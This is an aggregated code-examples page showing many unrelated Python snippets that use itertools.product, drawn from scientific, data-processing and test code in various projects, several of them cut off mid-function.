        Multiply two kernels (either on the same space, or on the tensor product of the input space).

        :param other: the other kernel to be multiplied
        :type other: GPy.kern
        :param tensor: whether or not to use the tensor space (default is false).
        :type tensor: bool

        """
        K1 = self.copy()
        K2 = other.copy()

        slices = []
        for sl1, sl2 in itertools.product(K1.input_slices, K2.input_slices):
            s1, s2 = [False] * K1.input_dim, [False] * K2.input_dim
            s1[sl1], s2[sl2] = [True], [True]
            slices += [s1 + s2]

        newkernparts = [prod(k1, k2, tensor) for k1, k2 in itertools.product(K1.parts, K2.parts)]

        if tensor:
            newkern = kern(K1.input_dim + K2.input_dim, newkernparts, slices)
        else:
            newkern = kern(K1.input_dim, newkernparts, slices)

        newkern._follow_constrains(K1, K2)
        return newkern
Example #28
File: blocking.py Project: derwiki/dedupe
    def createPredicateSet(self, disjunctive):

        # The set of simple predicates
        predicate_set = list(product(self.predicate_functions,
                                     self.fields))


        predicate_set.extend(product(self.tfidf_thresholds,
                                     self.fields))

        if disjunctive:
            disjunctive_predicates = list(combinations(predicate_set, 2))

            # filter out disjunctive predicates that operate on same
            # field
            disjunctive_predicates = [predicate for predicate
                                      in disjunctive_predicates
                                      if predicate[0][1]
                                      != predicate[1][1]]

            predicate_set = [(predicate, ) for predicate in
                             predicate_set]
            predicate_set.extend(disjunctive_predicates)
        else:

            predicate_set = [(predicate, ) for predicate in
                             predicate_set]

        return predicate_set
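A minimal sketch of the same construction with plain strings standing in for the predicate functions and tf-idf thresholds (all names here are hypothetical):

from itertools import combinations, product

predicate_functions = ["starts_with", "same_length"]
fields = ["name", "address"]

simple = list(product(predicate_functions, fields))      # 4 simple predicates
disjunctive = [pair for pair in combinations(simple, 2)
               if pair[0][1] != pair[1][1]]               # distinct fields only

print(len(simple), len(disjunctive))  # 4 4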
Example #29
def score_candidate_rects(node, region):
    """
    Score candidate bin rects in node.

    Return a list of (score, i, j, QRectF) tuples.

    """
    xs, xe, ys, ye = bindices(node, region)

    if node.contingencies.ndim == 3:
        c = node.contingencies
        # compute_chisqares expects classes in 1 dim
        chi_lr, chi_up = compute_chi_squares(
            c[xs: xe, ys: ye, :].swapaxes(1, 2).swapaxes(0, 1)
        )

        def max_chisq(i, j):
            def valid(i, j):
                return 0 <= i < chi_up.shape[0] and \
                       0 <= j < chi_lr.shape[1]

            return max(chi_lr[i, j] if valid(i, j) else 0,
                       chi_lr[i, j - 1] if valid(i, j - 1) else 0,
                       chi_up[i, j] if valid(i, j) else 0,
                       chi_up[i - 1, j] if valid(i - 1, j) else 0)

        return [(max_chisq(i - xs, j - ys), i, j,
                 QRectF(QPointF(node.xbins[i], node.ybins[j]),
                        QPointF(node.xbins[i + 1], node.ybins[j + 1])))
                 for i, j in itertools.product(range(xs, xe), range(ys, ye))]
    else:
        return [(1, i, j,
                 QRectF(QPointF(node.xbins[i], node.ybins[j]),
                        QPointF(node.xbins[i + 1], node.ybins[j + 1])))
                 for i, j in itertools.product(range(xs, xe), range(ys, ye))]
Example #30
File: reductions.py Project: jcorbin/dask
def partial_reduce(func, x, split_every, keepdims=False, dtype=None, name=None):
    """Partial reduction across multiple axes.

    Parameters
    ----------
    func : function
    x : Array
    split_every : dict
        Maximum reduction block sizes in each dimension.

    Example
    -------
    Reduce across axis 0 and 2, merging a maximum of 1 block in the 0th
    dimension, and 3 blocks in the 2nd dimension:

    >>> partial_reduce(np.min, x, {0: 1, 2: 3})    # doctest: +SKIP
    """
    name = name or 'p_reduce-' + tokenize(func, x, split_every, keepdims, dtype)
    parts = [list(partition_all(split_every.get(i, 1), range(n))) for (i, n)
             in enumerate(x.numblocks)]
    keys = product(*map(range, map(len, parts)))
    out_chunks = [tuple(1 for p in partition_all(split_every[i], c)) if i
                  in split_every else c for (i, c) in enumerate(x.chunks)]
    if not keepdims:
        out_axis = [i for i in range(x.ndim) if i not in split_every]
        getter = lambda k: get(out_axis, k)
        keys = map(getter, keys)
        out_chunks = list(getter(out_chunks))
    dsk = {}
    for k, p in zip(keys, product(*parts)):
        decided = dict((i, j[0]) for (i, j) in enumerate(p) if len(j) == 1)
        dummy = dict(i for i in enumerate(p) if i[0] not in decided)
        g = lol_tuples((x.name,), range(x.ndim), decided, dummy)
        dsk[(name,) + k] = (func, g)
    return Array(merge(dsk, x.dask), name, out_chunks, dtype=dtype)
Example #31
File: lab6a.py Project: runnerpeople/BMSTU
import itertools

def permut(iter_, r):
    return [''.join(p) for p in itertools.product(iter_, repeat=r)]
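For example, all binary strings of length 3:

print(permut('01', 3))
# ['000', '001', '010', '011', '100', '101', '110', '111']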
Example #32
	return struct.unpack("Q", sha256(s).digest()[:8])[0]

lala = given_keyid
lala ^= hash_byte(0, 0, hash_len)
for p, c in enumerate(hash_base):
	lala ^= hash_byte(ord(c), p, hash_len)
#lala is now the value we are searching when producing the bytewise sha256 for the remaining 7 positions
possible_hash_products = {}
for p in xrange(len(hash_base), hash_len):
	possible_hash_products[p] = tuple(hash_byte(c, p, hash_len) for c in xrange(256))

#we now create 2 lists with the products from position [-3:-1] and [-6:-4]
products = []
for prod in xrange(2):
	product = []
	for a,b,c in itertools.product(possible_hash_products[hash_len - 3 - (3 * prod)], possible_hash_products[hash_len - 2 - (3 * prod)], possible_hash_products[hash_len - 1 - (3 * prod)]):
		product.append(a^b^c)
	products.append(product)

#we now calculate the product of lala together with the first unknown position
product = []
for prod in possible_hash_products[len(hash_base)]:
	product.append(prod ^ lala)
products.append(product)

products0set = set(products[0])
#we now have to work with the 3 products and find a combination being 0

print "combining..."
t = time.time()
try:
Example #33
    def __init__(self,
                 multi_view,
                 target_info,
                 observed_target_state,
                 form_covariances,
                 reference=None,
                 target_set=None,
                 parametric=False):
        '''
        Parameters
        ----------
        multi_view : `multiple_queries`
           Instance of `multiple_queries`. Attributes
           `objectives`, `score_info` are key
           attributed. (Should maybe change constructor
           to reflect only what is needed.)
        target_info : object
           Passed as first argument to `self.form_covariances`.
        observed_target_state : np.float
           Observed value of the target estimator.
        form_covariances : callable
           Used in linear decomposition of each score
           and the target.
        reference : np.float (optional)
           Reference parameter for Gaussian approximation
           of target.
        target_set : sequence (optional)
           Which coordinates of target are really
           of interest. If not None, then coordinates
           not in target_set are assumed to have 0
           mean in the sampler.
        parametric : bool
           Use parametric covariance estimate?

        Notes
        -----
        The callable `form_covariances`
        should accept `target_info` as first argument
        and a keyword argument `cross_terms` which
        correspond to the `score_info` of each
        objective of `multi_view`. This used in
        a linear decomposition of each score into
        a piece correlated with `target` and
        an independent piece.
        The independent piece is treated as a
        nuisance parameter and conditioned on
        (i.e. is fixed within the sampler).
        '''

        # sampler will draw samples for bootstrap
        # these are arguments to target_info and score_bootstrap
        # nonparametric bootstrap is np.random.choice(n, size=(n,), replace=True)
        # residual bootstrap might be X_E.dot(\bar{\beta}_E)
        # + np.random.choice(resid, size=(n,), replace=True)

        # if target_set is not None, we assume that
        # these coordinates (specified by a list of coordinates) of target
        # is assumed to be independent of the rest
        # the corresponding block of `target_cov` is zeroed out

        # we need these attributes of multi_view

        self.nqueries = len(multi_view.objectives)
        self.opt_slice = multi_view.opt_slice
        self.objectives = multi_view.objectives

        self.observed_target_state = observed_target_state
        self.shape = observed_target_state.shape

        self.score_cov = []
        for i in range(self.nqueries):
            if not parametric:
                target_cov, cross_cov = multi_view.form_covariances(
                    target_info,
                    cross_terms=[multi_view.score_info[i]],
                    nsample=multi_view.nboot[i])
            else:
                target_cov, cross_cov = multi_view.form_covariances(
                    target_info, cross_terms=[multi_view.score_info[i]])

            self.target_cov = target_cov
            self.score_cov.append(cross_cov)

        # XXX we're not really using this target_set in our tests

        # zero out some coordinates of target_cov
        # to enforce independence of target and null statistics

        if target_set is not None:
            null_set = set(range(
                self.target_cov.shape[0])).difference(target_set)
            for t, n in product(target_set, null_set):
                self.target_cov[t, n] = 0.
                self.target_cov[n, t] = 0.

        self.target_transform = []
        for i in range(self.nqueries):
            self.target_transform.append(
                self.objectives[i].linear_decomposition(
                    self.score_cov[i], self.target_cov,
                    self.observed_target_state))

        self.target_inv_cov = np.linalg.inv(self.target_cov)
        # size of reference? should it only be target_set?
        if reference is None:
            reference = np.zeros(self.target_inv_cov.shape[0])
        self.reference = reference

        # need to vectorize the state for Langevin

        self.overall_opt_slice = slice(0, multi_view.num_opt_var)
        self.target_slice = slice(
            multi_view.num_opt_var,
            multi_view.num_opt_var + self._reference_inv.shape[0])
        self.keep_slice = self.target_slice

        # set the observed state

        self.observed_state = np.zeros(multi_view.num_opt_var +
                                       self._reference_inv.shape[0])
        self.observed_state[self.target_slice] = self.observed_target_state
        self.observed_state[
            self.overall_opt_slice] = multi_view.observed_opt_state
Example #34
 def __init__(self, points=10):
     self.kgrid = [k for k in product([i/points for i in range(points)],
                                      repeat=3)]
     self.kmax = np.ceil(points/(2*np.sqrt(3)))
     self.eigenvals = {}
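A standalone sketch of the same uniform k-grid construction (points=2 for brevity; the original defaults to 10):

from itertools import product

points = 2
kgrid = [k for k in product([i / points for i in range(points)], repeat=3)]
print(len(kgrid), kgrid[:2])  # 8 [(0.0, 0.0, 0.0), (0.0, 0.0, 0.5)]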
Example #35
def main():

    parser = argparse.ArgumentParser(
        description=
        "Assess whether words from the same category cluster together"
        "first considering their sound patterns and then how they correlate"
        "to each other based on their contexts of occurrence")

    parser.add_argument(
        "-c",
        "--corpus",
        required=True,
        dest="corpus",
        help="Specify the path to the training corpus (encoded as .json).")
    parser.add_argument(
        "-C",
        "--celex_folder",
        required=True,
        dest="celex_folder",
        help="Specify the folder where the Celex data are located.")
    parser.add_argument(
        "-O",
        "--output_folder",
        required=True,
        dest="output_folder",
        help=
        "Specify the path of the folder where the logfiles will be stored together with"
        "the summary tables.")
    parser.add_argument(
        "-M",
        "--pos_mapping",
        required=True,
        dest="pos_mapping",
        help=
        "Specify the path of the file containing the mapping from CHILDES to Celex PoS tags."
    )
    parser.add_argument(
        "-p",
        "--precision",
        dest="precision",
        default=5,
        help=
        "Specify the number of outcomes to consider when computing discrimination's precision."
    )
    parser.add_argument(
        "-l",
        "--longitudinal",
        action="store_true",
        dest="longitudinal",
        help="Specify whether to use a longitudinal design (default: False).")

    args = parser.parse_args()

    cues = ['triphones']
    outcomes = ['tokens']
    stress_marker = [True]
    boundaries = [True]
    reduced_vowels = [False]
    distances = ['correlation']
    number_of_cues = [100, 500, 1000]
    number_of_tokens = [50, 250, 500]

    if not os.path.exists(args.output_folder):
        os.makedirs(args.output_folder)

    summary_file = os.path.join(args.output_folder, "LDAk_summary.csv")
    # error_file = os.path.join(args.output_folder, "PoStagging_errors.csv")

    parametrizations = it.product(cues, outcomes, stress_marker, boundaries,
                                  reduced_vowels, distances, number_of_cues,
                                  number_of_tokens)

    time_points = np.linspace(10, 100, 10) if args.longitudinal else [100]
    rows = int(
        np.prod([
            len(cues),
            len(outcomes),
            len(stress_marker),
            len(reduced_vowels),
            len(boundaries),
            len(time_points),
            len(distances),
            len(number_of_cues),
            len(number_of_tokens)
        ]))
    # "Boundaries" added to the columns to match the fields written into each row below
    summary_table = pd.DataFrame(index=np.arange(0, rows),
                                 columns=[
                                     "Corpus", "Cues", "Outcomes", "Stress",
                                     "Boundaries", "Vowels", "Precision",
                                     "Time", "Distance", "numCues",
                                     "numTokens", "Phon_acc",
                                     "Phon_acc_subset", "Phon_baseline",
                                     "Distr_acc", "Distr_acc_subset",
                                     "Distr_baseline"
                                 ])

    ii = 0
    for parametrization in parametrizations:

        print(parametrization)

        cue, outcome, stress, boundary, reduced, distance, how_many_cues, how_many_tokens = parametrization

        uniphones = True if cue == 'uniphones' else False
        diphones = True if cue == 'diphones' else False
        triphones = True if cue == 'triphones' else False
        syllables = True if cue == 'syllables' else False
        vowels = 'reduced' if reduced else 'full'
        sm = "stress" if stress else 'no-stress'
        bound = 'yes' if boundary else 'no'
        training = os.path.splitext(os.path.basename(args.corpus))[0]

        encoded_corpus = corpus_encoder(args.corpus,
                                        args.celex_folder,
                                        args.pos_mapping,
                                        separator='~',
                                        stress_marker=stress,
                                        reduced=reduced,
                                        uniphones=uniphones,
                                        diphones=diphones,
                                        triphones=triphones,
                                        syllables=syllables,
                                        outcomes=outcome,
                                        boundaries=boundary)

        corpus_dir = os.path.dirname(encoded_corpus)

        a, b = [0.001, 0.001
                ] if training == 'aggregate_utterances' else [0.01, 0.01]
        file_paths = ndl(encoded_corpus,
                         alpha=a,
                         beta=b,
                         lam=1,
                         longitudinal=args.longitudinal)

        celex_dict = get_celex_dictionary(args.celex_folder, reduced=reduced)

        for idx, file_path in file_paths.items():

            matrix, cues2ids, outcomes2ids = load(file_path)

            # get the column ids of all perfectly discriminated outcomes at the current time point
            # perfectly discriminated outcomes are considered to be those whose jaccard coefficient
            # between true phonetic cues and most active phonetic cues for the outcome is 1
            discriminated_file = os.path.join(
                corpus_dir, '.'.join([
                    'discriminatedOutcomes',
                    str(int(idx)), ''.join(['at', str(args.precision)]), 'json'
                ]))

            if not os.path.exists(discriminated_file):
                discriminated = find_discriminated(matrix,
                                                   cues2ids,
                                                   outcomes2ids,
                                                   celex_dict,
                                                   stress_marker=stress,
                                                   uniphones=uniphones,
                                                   diphones=diphones,
                                                   triphones=triphones,
                                                   syllables=syllables,
                                                   boundaries=boundary,
                                                   at=int(args.precision))
                json.dump(discriminated, open(discriminated_file, 'w'))
            else:
                discriminated = json.load(open(discriminated_file, 'r'))

            print()
            print(
                "The discriminated outcomes have been identified (file: %s)." %
                discriminated_file)

            accuracies = subset_experiment(matrix,
                                           discriminated,
                                           how_many_cues=how_many_cues,
                                           how_many_tokens=how_many_tokens)

            summary_table.loc[ii] = pd.Series({
                "Corpus": training,
                "Cues": cue,
                "Outcomes": outcome,
                "Stress": sm,
                "Boundaries": bound,
                "Vowels": vowels,
                "Time": int(idx),
                "Distance": distance,
                "Precision": args.precision,
                "numCues": how_many_cues,
                "numTokens": how_many_tokens,
                "Phon_acc": accuracies[0],
                "Phon_acc_subset": accuracies[1],
                "Distr_acc": accuracies[3],
                "Distr_acc_subset": accuracies[4],
                "Phon_baseline": accuracies[2],
                "Distr_baseline": accuracies[5]
            })
            ii += 1

    if os.path.exists(summary_file):
        summary_table.to_csv(summary_file,
                             sep='\t',
                             index=False,
                             mode="a",
                             header=False)
    else:
        summary_table.to_csv(summary_file, sep='\t', index=False)
Example #36
    return bfgs, svrg, sdca, gd, agd


model_types = ['Linear', 'Logistic', 'Poisson']
l_l2sqs = [1e-3, 1e-2, 1e-1]

fig, axes = plt.subplots(len(model_types),
                         len(l_l2sqs),
                         figsize=(4 * len(l_l2sqs), 3 * len(model_types)),
                         sharey=True,
                         sharex=True)

n_samples = 1000
n_features = 20

for (model_type, l_l2sq), ax in zip(product(model_types, l_l2sqs),
                                    axes.ravel()):
    model = create_model(model_type, n_samples, n_features)

    bfgs, svrg, sdca, gd, agd = run_solvers(model, l_l2sq)
    plot_history([bfgs, svrg, sdca, gd, agd],
                 ax=ax,
                 dist_min=True,
                 log_scale=True)
    ax.legend_.remove()
    ax.set_xlabel('')
    ax.set_ylim([1e-9, 1])

for l_l2sq, ax in zip(l_l2sqs, axes[0]):
    ax.set_title(r'$\lambda = %.2g$' % l_l2sq)
Example #37
class TestCourseListGetForm(FormTestMixin, UsernameTestMixin,
                            SharedModuleStoreTestCase):
    """
    Tests for CourseListGetForm
    """
    FORM_CLASS = CourseListGetForm

    @classmethod
    def setUpClass(cls):
        super(TestCourseListGetForm, cls).setUpClass()

        cls.course = CourseFactory.create()

    def setUp(self):
        super(TestCourseListGetForm, self).setUp()

        self.student = UserFactory.create()
        self.set_up_data(self.student)

    def set_up_data(self, user):
        """
        Sets up the initial form data and the expected clean data.
        """
        self.initial = {'requesting_user': user}
        self.form_data = QueryDict(
            urlencode({
                'username': user.username,
            }),
            mutable=True,
        )
        self.cleaned_data = {
            'username': user.username,
            'org': '',
            'mobile': None,
            'search_term': '',
            'filter_': None,
        }

    def test_basic(self):
        self.assert_valid(self.cleaned_data)

    def test_org(self):
        org_value = 'test org name'
        self.form_data['org'] = org_value
        self.cleaned_data['org'] = org_value
        self.assert_valid(self.cleaned_data)

    @ddt.data(*product(
        [('mobile', 'mobile_available')],
        [(True, True), (False, False), ('1', True), ('0', False),
         (None, None)],
    ))
    @ddt.unpack
    def test_filter(self, param_field_name, param_field_value):
        param_name, field_name = param_field_name
        param_value, field_value = param_field_value

        self.form_data[param_name] = param_value
        self.cleaned_data[param_name] = field_value
        if field_value is not None:
            self.cleaned_data['filter_'] = {field_name: field_value}

        self.assert_valid(self.cleaned_data)
Example #38
        d.popleft()
for i in d:
    print(i,end=" ")


# # itertools

# itertools.product()

# In[ ]:


from itertools import product
A = map(int,input().split())
B = map(int, input().split())
print(*product(A,B))


# itertools.permutations()

# from itertools import permutations
# s, k = input().split()
# permutations = list(permutations(s, int(k)))
# permutations.sort()
# for i in permutations:
#     print("".join(i))

# itertools.combinations()
# 
# 
Example #39
from itertools import product

print(*product( list(map(int, input().split())), list(map(int, input().split()))))
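Given the input lines "1 2" and "3 4", this prints the Cartesian product as space-separated tuples; the equivalent with literal lists:

from itertools import product
print(*product([1, 2], [3, 4]))  # (1, 3) (1, 4) (2, 3) (2, 4)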
Example #40
def to_or_rules(joint):
    new_joint = [expand(parts) for parts in joint]
    joints_set = frozenset([frozenset(prod) for prod in itertools.product(*new_joint)])
    joints_tup = tuple(tuple(sorted(x)) for x in joints_set)
    return joints_tup
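
# A hedged usage sketch (assuming the surrounding expand() maps each rule part
# to a list of alternatives): product(*new_joint) picks one alternative per
# part, rewriting an AND of ORs as an OR of ANDs. For example, with
# expand('a|b') -> ['a', 'b'] and expand('c') -> ['c'],
# to_or_rules(['a|b', 'c']) would yield (('a', 'c'), ('b', 'c')) in some order.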
예제 #41
0
# coding: utf-8

import itertools

import pytest

from pawn.cards import Card, Deck


@pytest.mark.parametrize('suit,rank',
                         itertools.product(['♣', '♥'], ['A', '3']))
def test_card(suit, rank):
    card = Card(suit=suit, rank=rank)
    assert card.suit == suit
    assert card.rank == rank

@pytest.mark.parametrize('suit,rank',
                         [pytest.param(None, None, marks=pytest.mark.xfail(raises=ValueError)),
                          pytest.param('♣', None, marks=pytest.mark.xfail(raises=ValueError)),
                          pytest.param(None, '3', marks=pytest.mark.xfail(raises=ValueError))])
def test_bad_card(suit, rank):
    assert Card(suit=suit, rank=rank)

def test_deck():
    deck = Deck()
    assert len(deck.cards) == 52

def test_deck_card_class():

    class TestCard(Card):
        pass
예제 #42
0
        communication_radii = [communication_radii]
    for r in communication_radii:
        assert isinstance(r,
                          (float, int)), 'Communication radius must be a float or an int'
    communication_radii = [float(r) for r in communication_radii]
    try:
        modes = ast.literal_eval(args.mode)
    except ValueError:
        modes = args.mode
    if isinstance(modes, str):
        modes = [modes]
    for m in modes:
        assert m in ('static', 'dynamic'), 'Mode can only be "static" or "dynamic"'
    schemes = ast.literal_eval(args.scheme)
    assert isinstance(
        schemes,
        collections.abc.Iterable), 'Scheme must be a tuple or a list of tuples.'
    if isinstance(schemes[0], str):
        schemes = [schemes]
    all_problems = [
        Arguments(*v) for v in itertools.product(problems, communication_radii,
                                                 modes, schemes)
    ]
    assert all_problems

    if len(all_problems) == 1:
        run_problem(args.internal_output, all_problems[0])
    else:
        assert args.output_results, 'Must specify --output_results'
        run(args.output_results, all_problems)
예제 #43
0
    if seed_nans:
        frame.loc[1::11, '1st'] = np.nan
        frame.loc[3::17, '2nd'] = np.nan
        frame.loc[7::19, '3rd'] = np.nan
        frame.loc[8::19, '3rd'] = np.nan
        frame.loc[9::19, '3rd'] = np.nan

    return frame


# create input df, keys, and the bins
binned = []
ids = []
for seed_nans in [True, False]:
    for n, m in product((100, 1000), (5, 20)):

        df = seed_df(seed_nans, n, m)
        bins = None, np.arange(0, max(5, df['3rd'].max()) + 1, 2)
        keys = '1st', '2nd', ['1st', '2nd']
        for k, b in product(keys, bins):
            binned.append((df, k, b, n, m))
            ids.append("{}-{}-{}".format(k, n, m))


@pytest.mark.slow
@pytest.mark.parametrize("df, keys, bins, n, m", binned, ids=ids)
def test_series_groupby_value_counts(df, keys, bins, n, m):

    def rebuild_index(df):
        arr = list(map(df.index.get_level_values, range(df.index.nlevels)))
예제 #44
0
    def __lt__(self, other):
        return self.priority < other.priority

    def __eq__(self, other):
        return self.priority == other.priority


print(
    'Total iterations:',
    comb(len(commercial), 3) * comb(len(industry), 3) *
    comb(len(residence), 3))

for item in tqdm(
        itertools.product(itertools.combinations(commercial, 3),
                          itertools.combinations(industry, 3),
                          itertools.combinations(residence, 3))):
    prod = calculateComb(item)
    #    if prod > Max:
    #        print('\n', prod, item)
    #        Max = prod
    results.put(Result(-prod[0], (item, prod[1])))

cdict = dict()
#for i in range(2):
#    cdict[i] = results.get()
#    print(-cdict[i].priority, cdict[i].builds)
print('==============')
Rec = results.get()
print('Optimal strategy:', Rec.builds[0])
예제 #45
0
    def divide_his(self):
        """Here we divide HIS into two residues - HID, HIE - each with half the pKa value. We
           have to set interaction energies between HIS and other residues and for HIS-HIS
           interactions. We do this based on the values given in the paper."""

        to_drop_his = set()
        new_to_old_his = {}
        handled_interaction_pairs = set()

        items = list(self.residue_variables.items())

        #Find all HIS and split them.
        for key, residue in items:
            name = key[0]
            if name != 'HIS':
                continue

            old_instance_1 = residue.get_instance('1')
            old_instance_2 = residue.get_instance('2')
            old_instance_12 = residue.get_instance('1+2')

            base_name = '_' + '_'.join(key[-2:]) + '_'
            to_drop_his.add(key)

            hid = ResidueVariable("HId" + base_name)
            name = "HId" + base_name + "PROTONATED"
            hid_prot = ResidueInstance(True,
                                       name,
                                       energy=old_instance_1.energy)
            name = "HId" + base_name + "DEPROTONATED"
            hid_deprot = ResidueInstance(False, name)

            hid.instances["PROTONATED"] = hid_prot
            hid.instances["DEPROTONATED"] = hid_deprot

            res_tuple = ("HId", ) + key[-2:]
            self.residue_variables[res_tuple] = hid

            new_to_old_his[hid] = residue

            hie = ResidueVariable("HIe" + base_name)
            name = "HIe" + base_name + "PROTONATED"
            hie_prot = ResidueInstance(True,
                                       name,
                                       energy=old_instance_2.energy)
            name = "HIe" + base_name + "DEPROTONATED"
            hie_deprot = ResidueInstance(False, name)

            hie.instances["PROTONATED"] = hie_prot
            hie.instances["DEPROTONATED"] = hie_deprot

            res_tuple = ("HIe", ) + key[-2:]
            self.residue_variables[res_tuple] = hie

            #Keep a mapping to the original residue object so we can look up
            # interaction energies in the HIS/HIS interactions loop below.
            new_to_old_his[hie] = residue

            #Create interaction energies between newly created residues.
            energy = old_instance_12.energy - old_instance_1.energy - old_instance_2.energy
            self.add_interaction_energy_pair(hid_prot, hie_prot, energy)
            self.add_interaction_energy_pair(hid_prot, hie_deprot, 0.0)
            self.add_interaction_energy_pair(hid_deprot, hie_prot, 0.0)
            self.add_interaction_energy_pair(hid_deprot, hie_deprot,
                                             sys.float_info.max)

        #Delete residue variables from main map.
        for key in to_drop_his:
            del self.residue_variables[key]

        #This loop is order dependent for HIS/HIS interactions. That is why some
        # code paths that look as though they should be duplicates or symmetric
        # are not, and why we compare chain locations.
        # (In case you were wondering why HIe <-> HId is not the same as
        #  HId <-> HIe.)

        #See https://docs.python.org/2/library/itertools.html#itertools.product
        for v, w in product(iter(self.residue_variables.items()), repeat=2):
            his_key, his_residue = v
            other_key, other_residue = w
            his_name, his_chain, his_location = his_key
            other_name, other_chain, other_location = other_key

            if his_name not in ('HId', 'HIe'):
                continue

            his_location = int(his_location)
            other_location = int(other_location)

            his_prot = his_residue.instances["PROTONATED"]
            his_deprot = his_residue.instances["DEPROTONATED"]

            old_his = new_to_old_his[his_residue]
            old_his_instance_1 = old_his.get_instance('1')
            old_his_instance_2 = old_his.get_instance('2')
            old_his_instance_12 = old_his.get_instance('1+2')

            other_prot = other_residue.instances["PROTONATED"]
            other_deprot = other_residue.instances["DEPROTONATED"]

            #Handle creating interactions with HId
            if other_name == 'HId':
                # HIS/HIS is order dependent.
                if his_chain > other_chain or his_location >= other_location:
                    continue

                old_other = new_to_old_his[other_residue]
                old_other_instance_1 = old_other.get_instance('1')
                old_other_instance_2 = old_other.get_instance('2')
                old_other_instance_12 = old_other.get_instance('1+2')

                if his_name == 'HIe':
                    energy = self.interaction_energies[old_his_instance_12,
                                                       old_other_instance_12]

                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     0.0)

                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (
                        self.interaction_energies[old_his_instance_1,
                                                  old_other_instance_2] -
                        self.interaction_energies[old_his_instance_1,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_2])

                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)

                    energy = self.interaction_energies[old_his_instance_12,
                                                       old_other_instance_2]
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = (
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_12])
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_2,
                                                       old_other_instance_2]
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12),
                    (old_other_instance_1, old_other_instance_2,
                     old_other_instance_12))

                handled_interaction_pairs.update(combinations)

            #Handle creating interactions with HIe
            elif other_name == 'HIe':
                # HIS/HIS is order dependent.
                if his_chain > other_chain or his_location >= other_location:
                    continue

                old_other = new_to_old_his[other_residue]
                old_other_instance_1 = old_other.get_instance('1')
                old_other_instance_2 = old_other.get_instance('2')
                old_other_instance_12 = old_other.get_instance('1+2')

                if his_name == 'HIe':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)

                    energy = (self.interaction_energies[old_his_instance_12,
                                                        old_other_instance_1] -
                              self.interaction_energies[old_his_instance_12,
                                                        old_other_instance_12])

                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_1,
                                                       old_other_instance_12]
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_1,
                                                       old_other_instance_1]
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     0.0)
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_1] +
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_1])
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12),
                    (old_other_instance_1, old_other_instance_2,
                     old_other_instance_12))

                handled_interaction_pairs.update(combinations)

            #Handle creating interactions with non-HIS
            else:
                if his_name == 'HIe':
                    energy = (self.interaction_energies[old_his_instance_12,
                                                        other_prot] -
                              self.interaction_energies[old_his_instance_1,
                                                        other_prot])
                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_2,
                                                       other_deprot]
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (self.interaction_energies[old_his_instance_1,
                                                        other_deprot] +
                              self.interaction_energies[old_his_instance_2,
                                                        other_deprot] -
                              self.interaction_energies[old_his_instance_12,
                                                        other_deprot])
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    energy = self.interaction_energies[old_his_instance_1,
                                                       other_prot]
                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    energy = (self.interaction_energies[old_his_instance_12,
                                                        other_deprot] -
                              self.interaction_energies[old_his_instance_2,
                                                        other_deprot])
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = (self.interaction_energies[old_his_instance_1,
                                                        other_prot] +
                              self.interaction_energies[old_his_instance_2,
                                                        other_prot] -
                              self.interaction_energies[old_his_instance_12,
                                                        other_prot])
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     0.0)

                residue_combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12), (other_prot, other_deprot))
                name_combinations = [(tup[0], tup[1])
                                     for tup in residue_combinations]
                handled_interaction_pairs.update(name_combinations)

        #Clean out unused interaction energies
        self.drop_interaction_pairs(handled_interaction_pairs)
예제 #46
0
        line3 = line2.split(',')
        line3 = ' '.join(line3)
        f4.write(line3)
        f4.write("\n")
f4.close()

def display(OPL):
    if OPL == False:
        return 0
    if OPL == True:
        return 1
    return OPL

start_time = time.time()

TestPattern = list(itertools.product([0, 1], repeat=length))
f5 = open('NonTfc1.txt', 'r')
line1 = []
for line in f5:
    line1.append(line)
f5.close()

f6 = open("output1.txt", 'w')
f6.write("||")
for i in range(0, len(TestPattern)):
    Pattern = TestPattern[i]
    Flag = 0
    OutputList = {'a': Pattern[0]}
    count = 97
    for j in range(1, length):
        count = count + 1
예제 #47
0
    def get_interaction_combinations(self, pair1, pair2):
